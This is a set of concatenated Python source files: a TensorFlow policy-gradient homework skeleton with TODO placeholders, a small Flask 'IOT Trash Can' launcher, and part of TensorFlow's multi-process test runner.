# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
# YOUR_CODE_HERE
sy_logits_na = TODO
sy_sampled_ac = TODO # Hint: Use the tf.multinomial op
sy_logprob_n = TODO
else:
# YOUR_CODE_HERE
sy_mean = TODO
sy_logstd = TODO # logstd should just be a trainable variable, not a network output.
sy_sampled_ac = TODO
sy_logprob_n = TODO # Hint: Use the log probability under a multivariate gaussian.
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
loss = TODO # Loss function that we'll differentiate to get the policy gradient.
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
baseline_update_op = TODO
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"reward" : np.array(rewards),
"action" : np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
#====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
# YOUR_CODE_HERE
q_n = TODO
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
b_n = TODO
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
pass
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
pass
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
if __name__ == "__main__":
main()
|
main.py | #########################################################################
# The MIT License (MIT) #
# Copyright (c) 2016 Patrick Lai, Josh Manogaran, #
# Brendan Srinivasalu, Elias Tadros #
# #
# Permission is hereby granted, free of charge, to any person #
# obtaining a copy of this software and associated documentation #
# files (the "Software"), to deal in the Software without restriction, #
# including without limitation the rights to use, copy, modify, merge, #
# publish, distribute, sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is furnished to do so, #
# subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be #
# included in all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, #
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF #
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.#
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY #
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF #
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION #
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #
#########################################################################
# Standard Libraries from Python Software Foundation
from multiprocessing import Process
import Queue
import time
# Own modules
from route import *
from database import *
from comms import *
def main():
page = {'title' : 'IOT Trash Can'}
datalistener = Process(target=jsonListener,args=()) # Declare background process
datalistener.start() # Start process
app.run(host='0.0.0.0', port=8080, debug=True)
datalistener.join()
if __name__ == "__main__":
main()
|
multi_process_runner.py | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-process runner for testing purpose."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import json
import os
import signal
import sys
import threading
import time
import unittest
from absl import logging
import six
from six.moves import queue as Queue
from tensorflow.python import tf2
from tensorflow.python.compat import v2_compat
from tensorflow.python.distribute import multi_process_lib
from tensorflow.python.eager import context
multiprocessing = multi_process_lib.multiprocessing
# pylint: disable=g-import-not-at-top
try:
# `faulthandler` is not available in py2.
import faulthandler
except ImportError:
faulthandler = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import dill
except ImportError:
dill = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import tblib.pickling_support
# For pickling traceback objects.
tblib.pickling_support.install()
except ImportError:
pass
# _ProcessStatusInfo contains process status information. When is_successful
# attribute is True, the subprocess has ended successfully, or if False, the
# exception stack trace info is stored in exc_info to pass on to parent process
# to be re-raised.
_ProcessStatusInfo = collections.namedtuple(
'_ProcessStatusInfo',
['task_type', 'task_id', 'is_successful', 'exc_info', 'return_value'])
# Information returned from a successful MultiProcessRunner run.
MultiProcessRunnerResult = collections.namedtuple('MultiProcessRunnerResult',
['return_value', 'stdout'])
TestEnvironment = collections.namedtuple('TestEnvironment', [
'task_type', 'task_id', 'cluster_spec', 'rpc_layer', 'grpc_fail_fast',
'v2_enabled', 'executing_eagerly'
])
# Resources for communication between worker processes and the main process.
#
# `process_status_queue` is used by `multi_process_runner` internally for
# communication from subprocesses to the parent process for whether it's been
# successful, and if not what the error stack trace is.
# `parent_to_sub_queue` is used for communications from parent to subprocess.
# Currently this is only used to terminate subprocesses.
# TODO(rchao): Remove this once subprocess is terminated by SIGKILL.
# `streaming_pipe_w` is to stream stdout and stderr from subprocesses to parent
# process.
# `barrier` is a barrier for the party of all subprocesses.
Resources = collections.namedtuple('Resources', [
'process_status_queue', 'parent_to_sub_queue', 'streaming_pipe_w', 'barrier'
])
# Default time out sec is selected so that it's handled before the default
# "medium" timeout of the test runs.
_DEFAULT_TIMEOUT_SEC = 200
# The timeout in seconds to wait to force kill a child process. When a child
# process times out we first try to SIGTERM it so that it has a chance to dump
# stacktraces. However dumping stacktrace can take a long time.
_FORCE_KILL_WAIT_SEC = 30
class MultiProcessRunner(object):
"""A utility class to start multiple processes to simulate a cluster.
We need to use multiple processes to simulate a cluster in TF 2.0 tests
because TF 2.0 has some process-global data structures that have to be
separated by processes. We also need child processes to test out our fault
tolerance because shutting down a standard TensorFlow server within its
process is not supported.
Note: the main test program that uses this runner class must run main program
via `test_main` defined in this file. Using this runner in non-test binaries
is not supported yet.
This class is not thread-safe. Child processes will inherit TF2 behavior flag.
"""
def __init__(self,
proc_func,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_stdout=True,
list_stdout=False,
use_dill_for_args=True,
daemon=False,
dependence_on_chief=True,
auto_restart=False,
args=None,
kwargs=None):
"""Creates a multi-process runner.
Args:
proc_func: Function to be run on child processes. This will be run on
processes for all task types.
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers and two ps's.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"],
"ps": ["ps0.example.com:2222",
"ps1.example.com:2222"]}
rpc_layer: RPC layer to use. Default value is 'grpc'.
max_run_time: If set, child processes is forced to exit at approximately
this many seconds after `start` is called. We achieve this through
`signal.alarm()` api. Note that this is best effort at Python level
since Python signal handler does not get executed when it runs lower
level C/C++ code. So it can be delayed for arbitrarily long time.
If any of the child process is still running when `max_run_time` is up,
they will be force-terminated and a `UnexpectedSubprocessExitError`
may be raised at `join()`.
grpc_fail_fast: Whether GRPC connection between processes should fail
without retrying. Defaults to None, in which case the environment
variable is not explicitly set.
stream_stdout: True if the output/error from the subprocesses should be
streamed to be printed in parent process' log. Defaults to True.
list_stdout: True if the output/error from the subprocesses should be
collected to be attached to the resulting `MultiProcessRunnerResult`
returned from `MultiProcessRunner.join()`. If True, the list of stdout
can be retrieved via `MultiProcessRunnerResult.stdout` attribute.
Defaults to False.
use_dill_for_args: Whether to use dill to pickle `args` and `kwargs`. dill
can pickle more objects, but doesn't work with types in
`multiprocessing` library like `Mutex`.
daemon: Whether to start processes as daemons.
dependence_on_chief: Whether to terminates the cluster if the chief exits.
If auto_restart is True, it only terminates the cluster if the chief
exits with a zero exit code.
auto_restart: Whether to automatically restart processes that exit with
non-zero exit code.
args: Positional arguments to be sent to functions run on processes.
kwargs: Keyword arguments to be sent to functions run on processes.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
assert cluster_spec is not None
if 'chief' in cluster_spec and len(cluster_spec['chief']) > 1:
raise ValueError('If chief exists in the cluster, there must be at most '
'one chief. Current `cluster_spec` has {} chiefs.'
.format(len(cluster_spec['chief'])))
if not multi_process_lib.initialized():
raise RuntimeError('`multi_process_runner` is not initialized. '
'Please call `multi_process_runner.test_main()` '
'within `if __name__ == \'__main__\':` block '
'in your python module to properly initialize '
'`multi_process_runner`.')
if not callable(proc_func):
raise ValueError('proc_func is not a callable')
self._proc_func = proc_func
self._cluster_spec = cluster_spec
self._rpc_layer = rpc_layer or 'grpc'
self._max_run_time = max_run_time
self._grpc_fail_fast = grpc_fail_fast
self._stream_stdout = stream_stdout
# TODO(rchao): Revisit list_stdout argument to consider other solution.
self._list_stdout = list_stdout
self._dependence_on_chief = dependence_on_chief
self._use_dill_for_args = use_dill_for_args
self._daemon = daemon
self._auto_restart = auto_restart
self._args = args or ()
self._kwargs = kwargs or {}
# Child processes should have the same v2 and eager behavior.
self._v2_enabled = tf2.enabled()
self._executing_eagerly = context.executing_eagerly()
self._joined = False
self._process_lock = threading.Lock()
# Guarded by self._process_lock.
self._processes = {}
# Record which processes are terminated. Due to a bug in Python<3.7,
# terminated processes return 255 exit code, which should cause an exception
# in join().
# https://bugs.python.org/issue30589
# Guarded by self._process_lock.
self._terminated = set()
self._reading_threads = []
self._manager = manager()
self._process_status_queue = self._manager.Queue()
self._parent_to_sub_queue = self._manager.Queue()
parties = sum(len(addresses) for addresses in self._cluster_spec.values())
self._barrier = self._manager.Barrier(parties)
# We use a queue to collect outputs from worker processes since it's thread
# safe.
self._streaming_queue = self._manager.Queue()
self._watchdog_thread = None
def set_args(self, args=None, kwargs=None):
self._args = args or self._args
self._kwargs = kwargs or self._kwargs
def _continuously_readline_from_sub(self, pipe_r, task_type, task_id):
"""Function to continuously read lines from subprocesses."""
with os.fdopen(pipe_r.fileno(), 'r', closefd=False) as reader:
for line in reader:
task_string = '[{}-{}]:'.format(task_type, task_id)
formatted_line = '{} {}'.format(task_string.ljust(14), line)
if self._stream_stdout:
# TODO(rchao): Use a lock here to ensure the printed lines are not
# broken.
print(formatted_line, end='', flush=True)
if self._list_stdout:
self._streaming_queue.put(formatted_line)
def _start_subprocess_and_reading_thread(self,
task_type,
task_id,
cluster_spec=None,
proc_func=None,
args=None,
kwargs=None):
"""Start a subprocess and a thread the reads lines from the subprocess."""
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
test_env = TestEnvironment(
task_type=task_type,
task_id=task_id,
cluster_spec=cluster_spec or self._cluster_spec,
rpc_layer=self._rpc_layer,
grpc_fail_fast=self._grpc_fail_fast,
v2_enabled=self._v2_enabled,
executing_eagerly=self._executing_eagerly,
)
pipe_r, pipe_w = multiprocessing.Pipe(duplex=False)
resources = Resources(
process_status_queue=self._process_status_queue,
parent_to_sub_queue=self._parent_to_sub_queue,
streaming_pipe_w=pipe_w,
barrier=self._barrier,
)
if proc_func is None:
proc_func, args, kwargs = self._proc_func, self._args, self._kwargs
# Always use dill to pickle proc_func so that we support more callable
# types, e.g. lambda.
proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
if self._use_dill_for_args:
args = dill.dumps(args, dill.HIGHEST_PROTOCOL)
kwargs = dill.dumps(kwargs, dill.HIGHEST_PROTOCOL)
p = _Process(
test_env=test_env,
target=_ProcFunc(),
args=(resources, test_env, proc_func, args, kwargs,
self._use_dill_for_args),
daemon=self._daemon)
p.start()
self._processes[(task_type, task_id)] = p
self._terminated.discard((task_type, task_id))
# For each subprocess, we dedicate a thread continuously reading lines
# from them.
thread = threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._continuously_readline_from_sub,
args=(pipe_r, task_type, task_id))
thread.start()
self._reading_threads.append(thread)
if self._watchdog_thread is None or not self._watchdog_thread.is_alive():
self._watchdog_thread = threading.Thread(target=self._process_watchdog)
self._watchdog_thread.start()
def start(self):
"""Starts processes, one for each task in `cluster_spec`.
Note that this is best effort by the applicable multiprocessing library,
and it may take up to seconds for a subprocess to be successfully started.
"""
with self._process_lock:
if self._processes:
raise ValueError('MultiProcessRunner already started.')
if self._joined:
raise ValueError('cannot start new processes after'
'MultiProcessRunner.join() is called')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
self._start_subprocess_and_reading_thread(task_type, task_id)
# TODO(rchao): Remove the need of using SIGALRM if possible. At this time,
# without this the tests become very flaky.
if self._max_run_time is not None:
def handler(signum, frame):
del signum, frame
self.terminate_all()
signal.signal(signal.SIGALRM, handler)
signal.alarm(self._max_run_time)
def start_in_process_as(self, as_task_type, as_task_id):
"""Start the processes, with the specified task run in main process.
This is similar to `start()` except that the task with task_type
`as_task_type` and task_id `as_task_id` is run in the main process.
This method is particularly useful when debugging tool such as `pdb` is
needed in some specific task. Note that since this method is blocking until
that specific task exits, additional actions would need a thread to be
called:
```python
def proc_func():
# user code to be run
import pdb; pdb.set_trace()
def follow_ups():
time.sleep(5)
mpr.start_single_process(
task_type='evaluator',
task_id=0)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1))
threading.Thread(target=follow_ups).start()
mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
mpr.join()
```
Note that if `list_stdout=True`, the logs/stdout by task
run by the main process is not available in result.stdout.
Args:
as_task_type: The task type to be run in the main process.
as_task_id: The task id to be run in the main process.
"""
if self._processes:
raise ValueError('MultiProcessRunner already started.')
with self._process_lock:
if self._joined:
raise ValueError('cannot start new processes after'
'MultiProcessRunner.join() is called')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
if not (task_type == as_task_type and task_id == as_task_id):
self._start_subprocess_and_reading_thread(task_type, task_id)
_set_tf_config(as_task_type, as_task_id, self._cluster_spec,
self._rpc_layer)
self._proc_func(*self._args, **self._kwargs)
def start_single_process(self,
task_type,
task_id,
cluster_spec=None,
proc_func=None,
args=None,
kwargs=None):
"""Starts a single process.
This starts a process in the cluster with the task type, task id, and the
process function (`proc_func`). If process function is `None`, the function
provided at `__init__` will be used. If `cluster_spec` is `None`, the
cluster spec provided at `__init__` will be used.
TODO(rchao): It is meant that all subprocesses will be updated with the new
cluster spec, but this has yet to be implemented. At this time only the
newly started subprocess picks up this updated cluster spec.
Args:
task_type: The task type.
task_id: The task id.
cluster_spec: The cluster spec to be used on the newly started
process. If `None`, the cluster spec provided at `__init__` will be
used.
proc_func: The process function to be run on the newly started
process. If specified, specify `args` and `kwargs` as well. If `None`,
the function provided at `__init__` will be used.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
"""
with self._process_lock:
if self._joined:
raise ValueError('cannot start new processes after'
'MultiProcessRunner.join() is called')
self._start_subprocess_and_reading_thread(
task_type,
task_id,
cluster_spec=cluster_spec,
proc_func=proc_func,
args=args or (),
kwargs=kwargs or {})
def _queue_to_list(self, queue_to_convert):
"""Convert `queue.Queue` to `list`."""
list_to_return = []
# Calling `queue.empty()` is not reliable.
while True:
try:
list_to_return.append(queue_to_convert.get(block=False))
except Queue.Empty:
break
return list_to_return
def _get_process_statuses(self):
# One worker may have multiple statuses. We only keep the last one.
statuses = {}
for status in self._queue_to_list(self._process_status_queue):
statuses[(status.task_type, status.task_id)] = status
return statuses
def get_process_id(self, task_type, task_id):
"""Returns the subprocess id given the task type and task id."""
with self._process_lock:
p = self._processes.get((task_type, task_id), None)
return p.pid if p else None
def get_process_exit_code(self, task_type, task_id):
"""Returns the subprocess exit code given the task type and task id.
Args:
task_type: The task type.
task_id: The task id.
Returns:
The subprocess exit code; `None` if the subprocess has not exited yet.
Raises:
KeyError: If the corresponding subprocess is not found with `task_type`
and `task_id`.
"""
with self._process_lock:
p = self._processes[(task_type, task_id)]
return p.exitcode if p else None
def process_exists(self, task_type, task_id):
"""Returns whether the subprocess still exists given the task type and id.
Args:
task_type: The task type.
task_id: The task id.
Returns:
Boolean; whether the subprocess still exists. If the subprocess has
exited, this returns False.
"""
return self.get_process_exit_code(task_type, task_id) is None
def _process_watchdog(self):
"""Simulates a cluster management system.
- If auto_restart is True, it restarts processes that exit with a non-zero
exit code. Note that when join() times out it overrides auto_restart to
False.
- If dependence_on_chief is True, it terminates all processes once the chief
exits. If auto_restart is also True, it only terminates all processes if
the chief exit with a zero exit code, otherwise it restarts the chief.
This runs in self._watchdog_thread.
"""
while True:
time.sleep(1)
with self._process_lock:
chief = self._processes.get(('chief', 0), None)
# Terminate the cluster when _dependence_on_chief is True if either:
# - chief has exited with zero exit code.
# - chief has exited with non-zero exit code and self._auto_restart is
# False.
if chief and self._dependence_on_chief and chief.exitcode is not None:
if chief.exitcode == 0 or (not self._auto_restart):
for p in self._processes.values():
# Give other processes a chance to exit on their own.
p.join(timeout=3)
self._terminate_all()
for p in self._processes.values():
p.join()
return
# Auto restart failed processes if self._auto_restart is True.
if self._auto_restart:
has_failure = False
for (task_type, task_id), p in self._processes.items():
if p.exitcode is not None and p.exitcode != 0:
has_failure = True
logging.info('Restarting failed %s-%d', task_type, task_id)
self._start_subprocess_and_reading_thread(task_type, task_id)
if has_failure:
continue
# Exit the thread if all processes have exited at this point.
if all(p.exitcode is not None for p in self._processes.values()):
return
def _reraise_if_subprocess_error(self, process_statuses):
for process_status in process_statuses.values():
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
process_status.exc_info[1].mpr_result = self._get_mpr_result(
process_statuses)
six.reraise(*process_status.exc_info)
def join(self, timeout=_DEFAULT_TIMEOUT_SEC):
"""Joins all the processes with timeout.
If any of the subprocesses does not exit approximately after `timeout`
seconds has passed after `join` call, this raises a
`SubprocessTimeoutError`.
Note: At timeout, it uses SIGTERM to terminate the subprocesses, in order to
log the stack traces of the subprocesses when they exit. However, this
results in timeout when the test runs with tsan (thread sanitizer); if tsan
is being run on the test targets that rely on timeout to assert information,
`MultiProcessRunner.terminate_all()` must be called after `join()`, before
the test exits, so the subprocesses are terminated with SIGKILL, and data
race is removed.
Args:
timeout: if set and not all processes report status within roughly
`timeout` seconds, a `SubprocessTimeoutError` exception will be raised.
Returns:
A MultiProcessRunnerResult object, which has two attributes,
`return_value` and `stdout`. `return_value` always contains the return
values from the subprocesses. If `list_stdout` argument is True at
`__init__`, `stdout` is available that contains a list of all messages
from subprocesses' stdout and stderr.
Raises:
SubprocessTimeoutError: if not all processes report status approximately
within `timeout` seconds. When this is raised, a
`MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute, which has the same
structure as above 'Returns' section describes.
UnexpectedSubprocessExitError: If any of the subprocesses did not exit
properly (for example, they exit on SIGTERM or SIGKILL signal). When
this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
same structure as above 'Returns' section describes. If `max_run_time`
is not `None`, it is expected that some subprocesses may be
force-killed when `max_run_time` is up, and this is raised in those
cases.
Exception: if there is an Exception propagated from any subprocess. When
this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
same structure as above 'Returns' section describes.
"""
with self._process_lock:
if self._joined:
raise ValueError("MultiProcessRunner can't be joined twice.")
self._joined = True
self._watchdog_thread.join(timeout)
if self._watchdog_thread.is_alive():
# Timeout. Force termination to dump worker processes stack trace.
with self._process_lock:
self._auto_restart = False
logging.error('Timeout when joining for child processes. Terminating...')
self.terminate_all(sig=signal.SIGTERM)
# Wait for the processes to terminate by themselves first, so they have a
# chance to dump stacktraces. After _FORCE_KILL_WAIT_SEC, we SIGKILL them.
self._watchdog_thread.join(_FORCE_KILL_WAIT_SEC)
if self._watchdog_thread.is_alive():
logging.error('Timeout when waiting for child processes to '
'print stacktrace. Sending SIGKILL...')
self.terminate_all()
self._watchdog_thread.join()
process_statuses = self._get_process_statuses()
self._reraise_if_subprocess_error(process_statuses)
raise SubprocessTimeoutError('one or more subprocesses timed out.',
self._get_mpr_result(process_statuses))
for (task_type, task_id), p in self._processes.items():
logging.info('%s-%d exit code: %s', task_type, task_id, p.exitcode)
process_statuses = self._get_process_statuses()
self._reraise_if_subprocess_error(process_statuses)
# Checking all the processes that are expected to exit properly.
for (task_type, task_id), p in self._processes.items():
# Successfully exiting process has exit code 0. We ignore processes that
# are terminated.
assert p.exitcode is not None
if (p.exitcode > 0 and (task_type, task_id) not in self._terminated):
raise UnexpectedSubprocessExitError(
'Subprocess %s-%d exited with exit code %s. See logs for details.'
% (task_type, task_id, p.exitcode),
self._get_mpr_result(process_statuses))
logging.info('Joining log reading threads.')
for thread in self._reading_threads:
thread.join()
logging.info('Joined log reading threads.')
# Clear the alarm.
signal.alarm(0)
return self._get_mpr_result(process_statuses)
def _get_mpr_result(self, process_statuses):
stdout = self._queue_to_list(self._streaming_queue)
return_values = []
for process_status in process_statuses.values():
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return MultiProcessRunnerResult(stdout=stdout, return_value=return_values)
def terminate(self, task_type, task_id):
"""Terminates the process with `task_type` and `task_id`.
If auto_retart=True, the terminated task will be restarted unless the chief
has already exited with zero exit code.
Args:
task_type: the task type.
task_id: the task id.
"""
with self._process_lock:
p = self._processes.get((task_type, task_id), None)
if p is None:
raise ValueError('{}-{} does not exist'.format(task_type, task_id))
self._terminated.add((task_type, task_id))
# TODO(crccw): change to use Process.terminate() as well.
self._parent_to_sub_queue.put('terminate {} {}'.format(
task_type, task_id))
p.join()
def _terminate_all(self, sig=None):
"""Terminates all subprocesses.
The caller is required to hold self._process_lock.
Args:
sig: the signal used to terminate the process. The default is SIGKILL.
"""
